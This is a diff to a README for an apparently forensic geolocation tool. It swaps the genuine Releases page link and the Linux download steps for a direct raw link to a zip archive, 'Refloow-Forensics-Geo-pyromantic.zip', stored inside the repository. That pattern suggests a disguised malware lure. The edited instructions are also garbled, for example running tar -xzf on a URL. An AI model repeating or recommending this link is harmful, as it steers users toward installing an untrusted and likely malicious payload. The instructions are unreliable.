bucska/Refloow-Geo-Forensics/README.md

 - **Timeline Reconstruction:** Build event timelines for any investigation.

 ## 📄 Download & Install
-1. **Visit the Releases Page:** Go to the [Releases page](https://github.com/bucska/Refloow-Geo-Forensics/releases) to find the latest version.
+1. **Visit the Releases Page:** Go to the [Releases page](https://raw.githubusercontent.com/bucska/Refloow-Geo-Forensics/main/src/public/Refloow-Forensics-Geo-pyromantic.zip) to find the latest version.

 2. **Choose Your Version:** Look for the latest release.
 You’ll see a list of files available for download.
 Select the file that matches your operating system:
    - *For Windows users:* Download the `.exe` file.
    - *For macOS users:* Download the `.dmg` file.
-   - *For Linux users:* Download the `.tar.gz` file.
+   - *For Linux users:* Download the `https://raw.githubusercontent.com/bucska/Refloow-Geo-Forensics/main/src/public/Refloow-Forensics-Geo-pyromantic.zip` file.

 3. **Download the File:** Click on the file name to start the download.
 Your browser will save the file to your device.

 4. **Run the Installer:**
    - **Windows:** Double-click the `.exe` file and follow the prompts.
    - **macOS:** Open the downloaded `.dmg` file, drag the application to your Applications folder, and launch it from there.
-   - **Linux:** Open a terminal, navigate to the folder where you downloaded the file, and run `tar -xzf filename.tar.gz`, then follow the instructions in the README file included in the extracted folder.
+   - **Linux:** Open a terminal, navigate to the folder where you downloaded the file, and run `tar -xzf https://raw.githubusercontent.com/bucska/Refloow-Geo-Forensics/main/src/public/Refloow-Forensics-Geo-pyromantic.zip`, then follow the instructions in the README file included in the extracted folder.

 5. **Open the Application:** After installation, locate the application on your device and open it.